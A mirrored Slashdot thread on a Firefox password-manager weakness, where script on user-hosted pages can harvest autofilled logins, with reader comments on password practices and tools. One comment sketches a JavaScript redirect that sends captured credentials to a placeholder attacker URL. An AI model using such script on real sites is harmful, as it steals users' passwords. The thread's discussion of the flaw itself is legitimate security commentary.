Slashdot Mirror
Holes Remain Open in Firefox Password Manager
juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"
Which brings us back to simplistic password. I mean, you'd be surprised how many people have 1 2 3 4 5 as the key to their luggage. Or their atmosphere shield.
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
That's it, I'm leaving the Internet. Forever.
Do not use a pull model but a push model like the bugmenot extension. A right click in the login form would allow you to automatically enter saved information. It's much safer.
\u262D = \u5350
The article and TFS tell me that using NoScript (which I do) means that many Web2 sites no longer function properly. I cannot say that I have ever noticed this - has anybody? Perhaps it only affects the sort of web page that I would not wish to visit...?
Have a look at soylentnews.org for a different view
I used to think (back in my tech support days) that people who couldn't remember their password were just plain stupid. These days, I work in a large firm that has tons of different passwords for everything. Unix passwords, windows passwords, spam mail setting utility password, time tracking utilities have passwords, passwords are required for clearcase/clearquest, remote login, etc. Each of them has different password complexity rules. I no longer criticize people for forgetting their password.
Your sig(k) has been stolen. There is a puff of smoke!
Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript!, an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.
The thing that scared me away from the password manager in Firefox was a program called System Info for Windows. It lists all sorts of things about your computer--click on "Secrets." It searches for passwords in several programs--I have a few passwords saved in FF and the vast majority in Opera. I saw both programs mentioned in its analysis (meaning it searched both FF and Opera for saved passwords). It listed every saved FF password but no Opera passwords.
It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.
IE is not affected because it doesn't automatically enter the info into the forms on load.
Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."
Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.
I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.
Use KeePass http://keepass.info/. Open source, and better automation with websites and much more control than the internal password manager.
> Don't want to remember all your passwords? Don't use sites that require passwords.
Or more specificly: Don't use internet. How many webmails you know that don't use password? You couldn't even write to Slashdot, except anonymously.
> Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?
Yes, 3rd party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be number one suspects. So far I have never been robbed by they key holders, nor have I ever heard of a case that someone else had been.
> Having something "remember" your passwords defeats the purpose of having passwords.
Not really. It just makes the password behave more like client sertificates that automatically identify client to the server.
By using this extension, the security whole is fixed. Just have to wait around for FF to implement it natively.
2 9
This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).
https://addons.mozilla.org/en-US/firefox/addon/44
Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.
From the MSDN website I can quote:
So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.
document.location="http://some.hackers.url/collecThen redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)
Just stating the obvious, although now I'm actually curious if this works on IE...
It's not even really a browser security issue. Okay, I suppose there could be user-interaction requirements so the form-filler doesn't *automatically* autofill on page load, but the real issue is site-owners who ignore the basic principles of site security and password handling, and open their users up to simple exploits.
The central concept in much of web-client security assumes that a domain is a single entity, and if you trust the domain, you trust the domain entirely. I don't see fault in this assumption-- a line has to be drawn somewhere as to what "one entity" is, and to split it much further would lead to unnecessary hoops and inconveniences. Back in the NetSol-monopoly days before cheap domain names, this point may have been debatable, but at that time there was far less personal information getting passed around by clients, as well.
Nowadays, anyone who is running a service with open access and open-ended "userpages" should be taking the bare-minimum step of sub-domaining their users' pages, and sub-domaining their own login forms as well. It costs nothing, it's more convenient for users, and it sandboxes everyone from each others' potential hack-attacks. If an exploit that gets around that, then people can talk, as that'd be a legitimate XSS or trojan/spoofing exploit. This stuff, though, is pinning exploits borne of shoddy web-side security onto the client developers.
Information wants to be free.
Entertainment wants to be paid.
You just want to be cheap.
You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.
Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.
The "right" solution is to have a challenge/response protocol where your secret key is never sent out of your computer at all. The current password situation is a huge mess since you need a different password for every site or risk one compromised trusted site giving away your password to everything. Most users, even when using a password manager, aren't going to have unique passwords for every site, let alone strong ones. It wouldn't surprise me at all if such a protocol already exists in the HTML standard. It certainly should.
The downsides to this solution? 1) You need to have a browser that supports the protocol (no browsing in telnet). 2) You need to carry around your keys if you want to use them on more than one computer. 3) You need to explain it to users (but hopefully it can be almost transparent). I'm sure there are other problems but the current situation is untenable.
While I do use the PW Manager in Firefox, I have never allowed it to retain any critical pw's with those defined as any site where I enter financial or shipping information. For those sites, I use a dedicated PW Manager that allows me to generate more secure passwords using all available characters including special characters.
In the rare case that a website does not accept/allow special characters to be used for passwords, I tend to re-evaluate their value to me. I also notify both the webmaster and customer service that they've reduced the value of their business to me by not accepting secure passwords and that I will no longer deal with them except by a cash-n-carry basis. A few of them have responded positively and after some effort have increased their password security by allowing special characters and thus they've gained an increased level of business from me along with the positive word of mouth advertising to my friends and associates.
Mod me up/Mod me down: I wont frown as I've no crown
I rarely use a password manager, because I do not really trust them but also because, just as when using cookies to stay logged on a site, you just do not have to remember your password. This means that when you occasionnally want to log from another computer, for some urgent matter, you cannot find what your password was!
On the other hand, I generally use the same simplistic password on many sites just because there is no critical information on them. On some game sites, the most important information may be my real name and address if there is some incentive for this (read: prizes to win).
Strangely, one really critical site (my banking account) uses a not-so-hard password (6 digits), but this is constrained by the bank itself.
McCartney fans pay bus tickets. [...] Lennon fans too, with discretion.
Fanboy here. You're right. Got that outta the way
The problem is not really with the firefox password manager, because
1. Even if you only automatically entered a password with a push mechanism (right-click to fill in password information) then people would still do that on the "bad" scripts. The problem, like most things, is a problem of social hacking. Education is what is needed... maybe make firefox educational as it's logging into various login pages?
2. Remember the problem boils down to using your fileserver password for your myspace account: that's what this is talking about. It's not like an attacker can read your whole password manager, it can only get the password for a certain site that they have ALREADY compromised (myspace and facebook are sites that are compromised by design). If you use one password for all those inherently insecure sites, and another one for your email, and another one for your banking then this attack, even if successful, will not hurt you as much as you think it would Oh no! Some script kiddy finally managed to get my facebook password! He might upload pictures... and people would think I have a life.
somewhere, on a Big Red Sign:
if(color==blue){speed--;}
On a related note, they announced today that they were going to stop banning lighters. Not that the shoe bomber guy used a lighter (he used matches which have never been banned), but still. Semtex is a plastic explosive, and not readily flammable. It used to be really popular with the terrorists, but they've taken steps to make it much more easily detectable.
The TSA guy was quoted in the article saying that "Taking lighters away is security theater." Nice to see someone in charge gets it, and, even more choice, in getting it, quotes Bruce Schneier's catch phrase.
ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
Ideally, you should have 8 or more characters in every password (12 or more is good, 16 or more is great), they shouldn't be based on English words or names (or anything else familiar), they should contain non-English characters, and so on. Plus, you should have a unique one for every use and site. I don't know about you, but I visit at least 20 - 30 sites with some regularity. So should I really remember hundreds of randomesque characters?
My point is, you have a choice between sacrificing security one way or the other.
http://www.skullsecurity.org/blog/
"an attacker may emulate the login form "
This is the same old whore in new shoes. A javascript text entry masquerading as something else. You may as well point in apache's direction for htaccess too then.
As long as people do not think about what they are doing with their web browser, you will always have this problem. If people would think about web sites the same way they think about crossing a busy street the problem would be solved.
boycott slashdot February 10th - 17th check out: altSlashdot.org
You could have gone for insightful instead of trolling by writing something along the lines of "Generally, Opera has a much better safety record (the one we know of, anyway), and I prefer the UI."
I really like Opera, I even have it on my 3 phones and my PDA. Plus my 2 laptops, 4 stationaries, and I'm currently reading a book inspired by Opera. (Sorry, bad pun)
Trolling, however, will only get those who see your post to have a negative association to Opera, just like many have a negative association to Gentoo...
Using a different password for each site is the ultimate in security; however, without a password manager of some sort, it becomes too difficult to manage such a large list of passwords. Thankfully, OSS password managers such as Revelation and Figaro Password Manager exist! Personally, I use revelation; however, both are excellent pieces of software!
--Yahma
BlastProxy - Anonymous & Secure web browsing
ProxyStorm - Anonymous & Secure web browsing
LiarLiar - Open Source Voice Stress Analysis & Lie Detection Software
One ought not attribute to malice or stupidity what one can attribute to malice *and* stupidity.
Eloi, Eloi, lema sabachtani?
www.fogbound.net